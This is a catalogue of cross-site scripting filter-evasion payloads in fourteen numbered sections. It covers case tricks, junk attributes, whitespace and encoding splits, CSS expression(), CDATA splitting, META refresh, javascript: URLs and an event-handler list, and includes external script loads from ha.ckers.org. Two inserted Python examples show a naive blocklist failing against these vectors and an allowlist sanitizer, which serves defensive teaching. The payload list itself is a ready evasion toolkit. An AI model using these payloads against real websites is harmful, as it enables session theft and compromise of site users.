1. Change the character case

<sCript>alert('d')</scRipT>

2. Add extra characters to evade a regular-expression check

<<script>alert('c')//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>
<SCRIPT =">" SRC="t.js"></SCRIPT>
<SCRIPT a=">" '' SRC="t.js"></SCRIPT>
<SCRIPT "a='>'" SRC="t.js"></SCRIPT>
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
<SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Replace the .js extension with another extension

<script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:
body {
    background-image: url('javascript:alert("XSS");')
}

5. Insert other characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>
<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use tabs or newlines to evade (the tab and newline characters embedded inside "javascript" in these examples have been collapsed to spaces in this copy)

<img src="jav ascr ipt:alert('XSS3')">
<img src="jav ascr ipt:alert('XSS3')">
<IMG SRC="jav ascript:alert('XSS');">
-> tab
-> new line
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>
<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">
<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

(The hex-encoded form of the source lines did not survive in this copy; both the rendered and the "Source:" lines below show the decoded form.)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">
Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
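Sections 1 to 8 all target the same class of control: a blocklist that pattern-matches the raw text for one expected spelling of a tag. The following Python snippet is an added example, not code from the original post. It constructs a deliberately sloppy blocklist (a hypothetical filter, not a recommendation), feeds it the vectors listed above, and then shows the control that does not depend on spelling at all: context-aware output encoding of untrusted data, which turns every `<` into `&lt;` before the browser can parse it as markup.

```python
import html
import re

# A deliberately sloppy blocklist of the kind the evasions above are aimed at:
# a case-sensitive search for two literal spellings of a script tag.
# Constructed for this demonstration; it is the anti-pattern, not a recommendation.
NAIVE_BLOCKLIST = re.compile(r"<script>|<script src=")


def naive_blocklist_blocks(fragment: str) -> bool:
    """Return True when the sloppy blocklist would reject the fragment."""
    return NAIVE_BLOCKLIST.search(fragment) is not None


# Sample inputs taken from the list above (sections 1, 2, 3 and 5), plus one
# plain script tag as the control case.
SAMPLES = [
    "<script>alert(1)</script>",           # control: the spelling the filter expects
    "<sCript>alert('d')</scRipT>",         # section 1: case change
    '<SCRIPT a=">" SRC="t.js"></SCRIPT>',  # section 2: junk attribute before src
    '<script src="bad.jpg"></script>',     # section 3: non-.js extension
    '<SCRIPT/SRC="t.js"></SCRIPT>',        # section 5: "/" instead of a space
]


def encode_for_html_text(untrusted: str) -> str:
    """Context-aware output encoding for data placed into HTML text or a
    quoted attribute value. The characters < > & " ' become entities, so no
    spelling of a tag survives, whatever case, whitespace or punctuation
    trick is used: the browser never sees a '<' that opens markup."""
    return html.escape(untrusted, quote=True)


def survives_as_markup(encoded: str) -> bool:
    """True if an encoded string still contains a raw '<' or '>'."""
    return "<" in encoded or ">" in encoded


def evasions_that_slip_through() -> list:
    """The samples the sloppy blocklist lets through (three of the five)."""
    return [s for s in SAMPLES if not naive_blocklist_blocks(s)]


if __name__ == "__main__":
    for s in SAMPLES:
        print(f"blocked={naive_blocklist_blocks(s)!s:5}  encoded={encode_for_html_text(s)}")
```

The blocklist catches only the two samples that happen to contain one of its literal spellings; the case-changed, junk-attribute and slash variants pass straight through. The encoded output is identical in shape for all five: nothing is rejected, but nothing is executable either, because the decision no longer depends on recognising the payload.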
9. Script in an HTML tag (event handler attributes)

<body onload="alert('onload')">

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code contained in a SWF file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart and reassemble it

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>

13. Write a cookie via META

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. JavaScript in src, href and url

<IFRAME SRC=javascript:alert('13')></IFRAME>
<img src="javascript:alert('XSS3')">
<IMG DYNSRC="javascript:alert('XSS20')">
<IMG LOWSRC="javascript:alert('XSS21')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">
<IFRAME SRC=javascript:alert('XSS27')></IFRAME>
<TABLE BACKGROUND="javascript:alert('XSS29')">
<DIV STYLE="background-image: url(javascript:alert('XSS30'))">
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
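Sections 6, 8, 9 and 14 (and, less directly, 4, 7 and 10 to 13) share one lesson for the defender: when untrusted HTML has to be allowed at all, the filter must parse it, normalise each parsed value, and keep only what an allowlist permits, rather than searching the raw text. The following Python sanitizer is an added example, not code from the original post; it assumes a rich-text field that needs only a handful of tags, uses only the standard library (`html.parser`, `urllib.parse`), and its sample inputs are constructed from the vectors above.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allowlist policy for a rich-text field (hypothetical; tune to the application).
# Everything not listed is dropped: script, style, link, meta, embed, iframe,
# frameset, xml and the t: namespace never reach the output, whatever
# attributes or spellings they carry.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "img", "span", "div"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}

_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def normalize_url(value: str) -> str:
    """Undo the tricks from sections 6 and 8 before looking at the scheme:
    decode character references, delete tab/LF/CR anywhere (browsers do the
    same), and strip leading/trailing control characters and spaces."""
    value = html.unescape(value)
    value = value.replace("\t", "").replace("\n", "").replace("\r", "")
    return value.strip(_C0_AND_SPACE)


def url_is_safe(value: str) -> bool:
    """Allow relative URLs and an explicit list of schemes; reject everything else
    (so 'javascript:' in any case or encoding never reaches an href/src)."""
    scheme = urlsplit(normalize_url(value)).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Rebuild a fragment from parse events instead of pattern-matching the
    raw text. Unknown tags vanish, every on* handler (section 9) and every
    style attribute (sections 4 and 7) is dropped, URL attributes must pass
    url_is_safe (section 14), and script/style contents are discarded."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._discarding = False

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._discarding = True  # drop the element and its contents
            return
        if tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:  # the parser has already decoded entities
            name = name.lower()
            value = value or ""
            if name.startswith("on") or name == "style":
                continue
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in URL_ATTRS and not url_is_safe(value):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._discarding = False
            return
        if tag in ALLOWED_TAGS and tag != "img":  # img is a void element
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._discarding:
            self.out.append(html.escape(data, quote=False))  # re-encode text


def sanitize(fragment: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed inputs based on the vectors in sections 1, 6, 8, 9 and 14.
    for sample in [
        "<body onload=\"alert('onload')\">hi</body>",
        "<img src=\"jav\tascr\nipt:alert('XSS3')\">",
        "<IFRAME SRC=javascript:alert('13')></IFRAME>",
        '<a href="&#106;avascript:alert(1)" onclick="alert(1)">link</a>',
    ]:
        print(repr(sample), "->", repr(sanitize(sample)))
```

Two design points matter here. First, the decision is made on parsed values: `html.parser` has already lowercased the tag name, decoded character references in attribute values and preserved the raw tab/newline bytes, so the case, entity and whitespace tricks from sections 1, 6 and 8 are undone before the scheme check runs (`normalize_url` repeats the decoding so it is also safe to call on raw values). Second, the output is regenerated from those events with every text node and attribute value re-encoded, so nothing from the input is ever copied through verbatim. A production system should still prefer a maintained sanitizer library over a hand-written one; this block shows the shape of the check, not a finished product.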